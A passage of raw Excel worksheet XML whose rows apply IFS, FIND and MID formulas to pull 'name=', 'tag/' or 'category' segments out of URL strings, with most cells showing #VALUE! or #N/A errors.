        <f t="array" ref="E3451">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3451)), MID($A3451, FIND("name=",$A3451) + 5, LEN($A3451) - FIND("name=",$A3451)),
    ISNUMBER(FIND("tag/",$A3451)), MID($A3451, FIND("tag/",$A3451) + 4, LEN($A3451) - FIND("tag/",$A3451)),
    ISNUMBER(FIND("category",$A3451)), MID($A3451, FIND("category",$A3451) + 9, LEN($A3451) - FIND("category",$A3451)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3451" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3452" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3452" t="s">
        <v>2368</v>
      </c>
      <c r="B3452" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3452" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3452" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3452" t="e" cm="1">
        <f t="array" ref="E3452">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3452)), MID($A3452, FIND("name=",$A3452) + 5, LEN($A3452) - FIND("name=",$A3452)),
    ISNUMBER(FIND("tag/",$A3452)), MID($A3452, FIND("tag/",$A3452) + 4, LEN($A3452) - FIND("tag/",$A3452)),
    ISNUMBER(FIND("category",$A3452)), MID($A3452, FIND("category",$A3452) + 9, LEN($A3452) - FIND("category",$A3452)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3452" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3453" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3453" t="s">
        <v>2413</v>
      </c>
      <c r="B3453" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3453" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3453" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3453" t="e" cm="1">
        <f t="array" ref="E3453">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3453)), MID($A3453, FIND("name=",$A3453) + 5, LEN($A3453) - FIND("name=",$A3453)),
    ISNUMBER(FIND("tag/",$A3453)), MID($A3453, FIND("tag/",$A3453) + 4, LEN($A3453) - FIND("tag/",$A3453)),
    ISNUMBER(FIND("category",$A3453)), MID($A3453, FIND("category",$A3453) + 9, LEN($A3453) - FIND("category",$A3453)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3453" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3454" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3454" t="s">
        <v>2601</v>
      </c>
      <c r="B3454" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3454" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3454" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3454" t="e" cm="1">
        <f t="array" ref="E3454">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3454)), MID($A3454, FIND("name=",$A3454) + 5, LEN($A3454) - FIND("name=",$A3454)),
    ISNUMBER(FIND("tag/",$A3454)), MID($A3454, FIND("tag/",$A3454) + 4, LEN($A3454) - FIND("tag/",$A3454)),
    ISNUMBER(FIND("category",$A3454)), MID($A3454, FIND("category",$A3454) + 9, LEN($A3454) - FIND("category",$A3454)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3454" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3455" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3455" t="s">
        <v>2368</v>
      </c>
      <c r="B3455" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3455" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3455" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3455" t="e" cm="1">
        <f t="array" ref="E3455">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3455)), MID($A3455, FIND("name=",$A3455) + 5, LEN($A3455) - FIND("name=",$A3455)),
    ISNUMBER(FIND("tag/",$A3455)), MID($A3455, FIND("tag/",$A3455) + 4, LEN($A3455) - FIND("tag/",$A3455)),
    ISNUMBER(FIND("category",$A3455)), MID($A3455, FIND("category",$A3455) + 9, LEN($A3455) - FIND("category",$A3455)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3455" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3456" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3456" t="s">
        <v>2248</v>
      </c>
      <c r="B3456" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3456" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3456" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3456" t="e" cm="1">
        <f t="array" ref="E3456">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3456)), MID($A3456, FIND("name=",$A3456) + 5, LEN($A3456) - FIND("name=",$A3456)),
    ISNUMBER(FIND("tag/",$A3456)), MID($A3456, FIND("tag/",$A3456) + 4, LEN($A3456) - FIND("tag/",$A3456)),
    ISNUMBER(FIND("category",$A3456)), MID($A3456, FIND("category",$A3456) + 9, LEN($A3456) - FIND("category",$A3456)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3456" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3457" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3457" t="s">
        <v>2248</v>
      </c>
      <c r="B3457" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3457" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3457" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3457" t="e" cm="1">
        <f t="array" ref="E3457">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3457)), MID($A3457, FIND("name=",$A3457) + 5, LEN($A3457) - FIND("name=",$A3457)),
    ISNUMBER(FIND("tag/",$A3457)), MID($A3457, FIND("tag/",$A3457) + 4, LEN($A3457) - FIND("tag/",$A3457)),
    ISNUMBER(FIND("category",$A3457)), MID($A3457, FIND("category",$A3457) + 9, LEN($A3457) - FIND("category",$A3457)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3457" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3458" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3458" t="s">
        <v>2601</v>
      </c>
      <c r="B3458" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3458" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3458" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3458" t="e" cm="1">
        <f t="array" ref="E3458">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3458)), MID($A3458, FIND("name=",$A3458) + 5, LEN($A3458) - FIND("name=",$A3458)),
    ISNUMBER(FIND("tag/",$A3458)), MID($A3458, FIND("tag/",$A3458) + 4, LEN($A3458) - FIND("tag/",$A3458)),
    ISNUMBER(FIND("category",$A3458)), MID($A3458, FIND("category",$A3458) + 9, LEN($A3458) - FIND("category",$A3458)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3458" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3459" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3459" t="s">
        <v>2368</v>
      </c>
      <c r="B3459" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3459" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3459" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3459" t="e" cm="1">
        <f t="array" ref="E3459">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3459)), MID($A3459, FIND("name=",$A3459) + 5, LEN($A3459) - FIND("name=",$A3459)),
    ISNUMBER(FIND("tag/",$A3459)), MID($A3459, FIND("tag/",$A3459) + 4, LEN($A3459) - FIND("tag/",$A3459)),
    ISNUMBER(FIND("category",$A3459)), MID($A3459, FIND("category",$A3459) + 9, LEN($A3459) - FIND("category",$A3459)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3459" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3460" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3460" t="s">
        <v>2818</v>
      </c>
      <c r="B3460" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3460" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3460" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3460" t="e" cm="1">
        <f t="array" ref="E3460">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3460)), MID($A3460, FIND("name=",$A3460) + 5, LEN($A3460) - FIND("name=",$A3460)),
    ISNUMBER(FIND("tag/",$A3460)), MID($A3460, FIND("tag/",$A3460) + 4, LEN($A3460) - FIND("tag/",$A3460)),
    ISNUMBER(FIND("category",$A3460)), MID($A3460, FIND("category",$A3460) + 9, LEN($A3460) - FIND("category",$A3460)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3460" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3461" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3461" t="s">
        <v>2575</v>
      </c>
      <c r="B3461" t="e">
        <f t="shared" si="160"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3461" t="e">
        <f t="shared" si="161"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3461" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3461" t="e" cm="1">
        <f t="array" ref="E3461">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3461)), MID($A3461, FIND("name=",$A3461) + 5, LEN($A3461) - FIND("name=",$A3461)),
    ISNUMBER(FIND("tag/",$A3461)), MID($A3461, FIND("tag/",$A3461) + 4, LEN($A3461) - FIND("tag/",$A3461)),
    ISNUMBER(FIND("category",$A3461)), MID($A3461, FIND("category",$A3461) + 9, LEN($A3461) - FIND("category",$A3461)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3461" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3462" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3462" t="s">
        <v>2377</v>
      </c>
      <c r="B3462" t="e">
        <f t="shared" ref="B3462:B3525" si="163">IF(FIND("name=",A3462,1)&gt;0,MID(A3462,FIND("name=",A3462,1)+5,LEN(A3462)-FIND("name=",A3462,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C3462" t="e">
        <f t="shared" ref="C3462:C3525" si="164">IF(FIND("tag/",$A3462,1)&gt;0,MID($A3462,FIND("tag/",$A3462,1)+4,LEN($A3462)-FIND("tag/",$A3462,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D3462" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3462" t="e" cm="1">
        <f t="array" ref="E3462">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3462)), MID($A3462, FIND("name=",$A3462) + 5, LEN($A3462) - FIND("name=",$A3462)),
    ISNUMBER(FIND("tag/",$A3462)), MID($A3462, FIND("tag/",$A3462) + 4, LEN($A3462) - FIND("tag/",$A3462)),
    ISNUMBER(FIND("category",$A3462)), MID($A3462, FIND("category",$A3462) + 9, LEN($A3462) - FIND("category",$A3462)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3462" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3463" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3463" t="s">
        <v>2368</v>
      </c>
      <c r="B3463" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3463" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3463" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3463" t="e" cm="1">
        <f t="array" ref="E3463">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3463)), MID($A3463, FIND("name=",$A3463) + 5, LEN($A3463) - FIND("name=",$A3463)),
    ISNUMBER(FIND("tag/",$A3463)), MID($A3463, FIND("tag/",$A3463) + 4, LEN($A3463) - FIND("tag/",$A3463)),
    ISNUMBER(FIND("category",$A3463)), MID($A3463, FIND("category",$A3463) + 9, LEN($A3463) - FIND("category",$A3463)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3463" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3464" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3464" t="s">
        <v>2248</v>
      </c>
      <c r="B3464" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3464" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3464" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3464" t="e" cm="1">
        <f t="array" ref="E3464">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3464)), MID($A3464, FIND("name=",$A3464) + 5, LEN($A3464) - FIND("name=",$A3464)),
    ISNUMBER(FIND("tag/",$A3464)), MID($A3464, FIND("tag/",$A3464) + 4, LEN($A3464) - FIND("tag/",$A3464)),
    ISNUMBER(FIND("category",$A3464)), MID($A3464, FIND("category",$A3464) + 9, LEN($A3464) - FIND("category",$A3464)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3464" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3465" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3465" t="s">
        <v>2248</v>
      </c>
      <c r="B3465" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3465" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3465" t="e">
        <f t="shared" si="162"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3465" t="e" cm="1">
        <f t="array" ref="E3465">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3465)), MID($A3465, FIND("name=",$A3465) + 5, LEN($A3465) - FIND("name=",$A3465)),
    ISNUMBER(FIND("tag/",$A3465)), MID($A3465, FIND("tag/",$A3465) + 4, LEN($A3465) - FIND("tag/",$A3465)),
    ISNUMBER(FIND("category",$A3465)), MID($A3465, FIND("category",$A3465) + 9, LEN($A3465) - FIND("category",$A3465)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3465" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3466" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3466" t="s">
        <v>2362</v>
      </c>
      <c r="B3466" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3466" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3466" t="str">
        <f t="shared" si="162"/>
        <v>updates/</v>
      </c>
      <c r="E3466" t="str" cm="1">
        <f t="array" ref="E3466">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3466)), MID($A3466, FIND("name=",$A3466) + 5, LEN($A3466) - FIND("name=",$A3466)),
    ISNUMBER(FIND("tag/",$A3466)), MID($A3466, FIND("tag/",$A3466) + 4, LEN($A3466) - FIND("tag/",$A3466)),
    ISNUMBER(FIND("category",$A3466)), MID($A3466, FIND("category",$A3466) + 9, LEN($A3466) - FIND("category",$A3466)))</f>
        <v>updates/</v>
      </c>
      <c r="F3466" t="s">
        <v>3341</v>
      </c>
    </row>
    <row r="3467" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3467" t="s">
        <v>2601</v>
      </c>
      <c r="B3467" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3467" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3467" t="e">
        <f t="shared" ref="D3467:D3530" si="165">IF(FIND("category",$A3467,1)&gt;0,MID($A3467,FIND("category",$A3467,1)+9,LEN($A3467)-FIND("category",$A3467,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E3467" t="e" cm="1">
        <f t="array" ref="E3467">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3467)), MID($A3467, FIND("name=",$A3467) + 5, LEN($A3467) - FIND("name=",$A3467)),
    ISNUMBER(FIND("tag/",$A3467)), MID($A3467, FIND("tag/",$A3467) + 4, LEN($A3467) - FIND("tag/",$A3467)),
    ISNUMBER(FIND("category",$A3467)), MID($A3467, FIND("category",$A3467) + 9, LEN($A3467) - FIND("category",$A3467)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3467" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3468" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3468" t="s">
        <v>2248</v>
      </c>
      <c r="B3468" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3468" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3468" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3468" t="e" cm="1">
        <f t="array" ref="E3468">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3468)), MID($A3468, FIND("name=",$A3468) + 5, LEN($A3468) - FIND("name=",$A3468)),
    ISNUMBER(FIND("tag/",$A3468)), MID($A3468, FIND("tag/",$A3468) + 4, LEN($A3468) - FIND("tag/",$A3468)),
    ISNUMBER(FIND("category",$A3468)), MID($A3468, FIND("category",$A3468) + 9, LEN($A3468) - FIND("category",$A3468)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3468" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3469" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3469" t="s">
        <v>2368</v>
      </c>
      <c r="B3469" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3469" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3469" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3469" t="e" cm="1">
        <f t="array" ref="E3469">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3469)), MID($A3469, FIND("name=",$A3469) + 5, LEN($A3469) - FIND("name=",$A3469)),
    ISNUMBER(FIND("tag/",$A3469)), MID($A3469, FIND("tag/",$A3469) + 4, LEN($A3469) - FIND("tag/",$A3469)),
    ISNUMBER(FIND("category",$A3469)), MID($A3469, FIND("category",$A3469) + 9, LEN($A3469) - FIND("category",$A3469)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3469" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3470" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3470" t="s">
        <v>2368</v>
      </c>
      <c r="B3470" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3470" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3470" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3470" t="e" cm="1">
        <f t="array" ref="E3470">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3470)), MID($A3470, FIND("name=",$A3470) + 5, LEN($A3470) - FIND("name=",$A3470)),
    ISNUMBER(FIND("tag/",$A3470)), MID($A3470, FIND("tag/",$A3470) + 4, LEN($A3470) - FIND("tag/",$A3470)),
    ISNUMBER(FIND("category",$A3470)), MID($A3470, FIND("category",$A3470) + 9, LEN($A3470) - FIND("category",$A3470)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3470" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3471" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3471" t="s">
        <v>2248</v>
      </c>
      <c r="B3471" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3471" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3471" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3471" t="e" cm="1">
        <f t="array" ref="E3471">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3471)), MID($A3471, FIND("name=",$A3471) + 5, LEN($A3471) - FIND("name=",$A3471)),
    ISNUMBER(FIND("tag/",$A3471)), MID($A3471, FIND("tag/",$A3471) + 4, LEN($A3471) - FIND("tag/",$A3471)),
    ISNUMBER(FIND("category",$A3471)), MID($A3471, FIND("category",$A3471) + 9, LEN($A3471) - FIND("category",$A3471)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3471" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3472" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3472" t="s">
        <v>2845</v>
      </c>
      <c r="B3472" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3472" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3472" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3472" t="e" cm="1">
        <f t="array" ref="E3472">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3472)), MID($A3472, FIND("name=",$A3472) + 5, LEN($A3472) - FIND("name=",$A3472)),
    ISNUMBER(FIND("tag/",$A3472)), MID($A3472, FIND("tag/",$A3472) + 4, LEN($A3472) - FIND("tag/",$A3472)),
    ISNUMBER(FIND("category",$A3472)), MID($A3472, FIND("category",$A3472) + 9, LEN($A3472) - FIND("category",$A3472)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3472" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3473" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3473" t="s">
        <v>2601</v>
      </c>
      <c r="B3473" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3473" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3473" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3473" t="e" cm="1">
        <f t="array" ref="E3473">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3473)), MID($A3473, FIND("name=",$A3473) + 5, LEN($A3473) - FIND("name=",$A3473)),
    ISNUMBER(FIND("tag/",$A3473)), MID($A3473, FIND("tag/",$A3473) + 4, LEN($A3473) - FIND("tag/",$A3473)),
    ISNUMBER(FIND("category",$A3473)), MID($A3473, FIND("category",$A3473) + 9, LEN($A3473) - FIND("category",$A3473)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3473" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3474" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3474" t="s">
        <v>2368</v>
      </c>
      <c r="B3474" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3474" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3474" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3474" t="e" cm="1">
        <f t="array" ref="E3474">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3474)), MID($A3474, FIND("name=",$A3474) + 5, LEN($A3474) - FIND("name=",$A3474)),
    ISNUMBER(FIND("tag/",$A3474)), MID($A3474, FIND("tag/",$A3474) + 4, LEN($A3474) - FIND("tag/",$A3474)),
    ISNUMBER(FIND("category",$A3474)), MID($A3474, FIND("category",$A3474) + 9, LEN($A3474) - FIND("category",$A3474)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3474" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3475" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3475" t="s">
        <v>2845</v>
      </c>
      <c r="B3475" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3475" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3475" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3475" t="e" cm="1">
        <f t="array" ref="E3475">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3475)), MID($A3475, FIND("name=",$A3475) + 5, LEN($A3475) - FIND("name=",$A3475)),
    ISNUMBER(FIND("tag/",$A3475)), MID($A3475, FIND("tag/",$A3475) + 4, LEN($A3475) - FIND("tag/",$A3475)),
    ISNUMBER(FIND("category",$A3475)), MID($A3475, FIND("category",$A3475) + 9, LEN($A3475) - FIND("category",$A3475)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3475" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3476" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3476" t="s">
        <v>2601</v>
      </c>
      <c r="B3476" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3476" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3476" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3476" t="e" cm="1">
        <f t="array" ref="E3476">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3476)), MID($A3476, FIND("name=",$A3476) + 5, LEN($A3476) - FIND("name=",$A3476)),
    ISNUMBER(FIND("tag/",$A3476)), MID($A3476, FIND("tag/",$A3476) + 4, LEN($A3476) - FIND("tag/",$A3476)),
    ISNUMBER(FIND("category",$A3476)), MID($A3476, FIND("category",$A3476) + 9, LEN($A3476) - FIND("category",$A3476)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3476" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3477" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3477" t="s">
        <v>2260</v>
      </c>
      <c r="B3477" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3477" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3477" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3477" t="e" cm="1">
        <f t="array" ref="E3477">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3477)), MID($A3477, FIND("name=",$A3477) + 5, LEN($A3477) - FIND("name=",$A3477)),
    ISNUMBER(FIND("tag/",$A3477)), MID($A3477, FIND("tag/",$A3477) + 4, LEN($A3477) - FIND("tag/",$A3477)),
    ISNUMBER(FIND("category",$A3477)), MID($A3477, FIND("category",$A3477) + 9, LEN($A3477) - FIND("category",$A3477)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3477" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3478" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3478" t="s">
        <v>2260</v>
      </c>
      <c r="B3478" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3478" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3478" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3478" t="e" cm="1">
        <f t="array" ref="E3478">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3478)), MID($A3478, FIND("name=",$A3478) + 5, LEN($A3478) - FIND("name=",$A3478)),
    ISNUMBER(FIND("tag/",$A3478)), MID($A3478, FIND("tag/",$A3478) + 4, LEN($A3478) - FIND("tag/",$A3478)),
    ISNUMBER(FIND("category",$A3478)), MID($A3478, FIND("category",$A3478) + 9, LEN($A3478) - FIND("category",$A3478)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3478" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3479" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3479" t="s">
        <v>2260</v>
      </c>
      <c r="B3479" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3479" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3479" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3479" t="e" cm="1">
        <f t="array" ref="E3479">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3479)), MID($A3479, FIND("name=",$A3479) + 5, LEN($A3479) - FIND("name=",$A3479)),
    ISNUMBER(FIND("tag/",$A3479)), MID($A3479, FIND("tag/",$A3479) + 4, LEN($A3479) - FIND("tag/",$A3479)),
    ISNUMBER(FIND("category",$A3479)), MID($A3479, FIND("category",$A3479) + 9, LEN($A3479) - FIND("category",$A3479)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3479" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3480" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3480" t="s">
        <v>2260</v>
      </c>
      <c r="B3480" t="e">
        <f t="shared" si="163"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3480" t="e">
        <f t="shared" si="164"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3480" t="e">
        <f t="shared" si="165"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3480" t="e" cm="1">
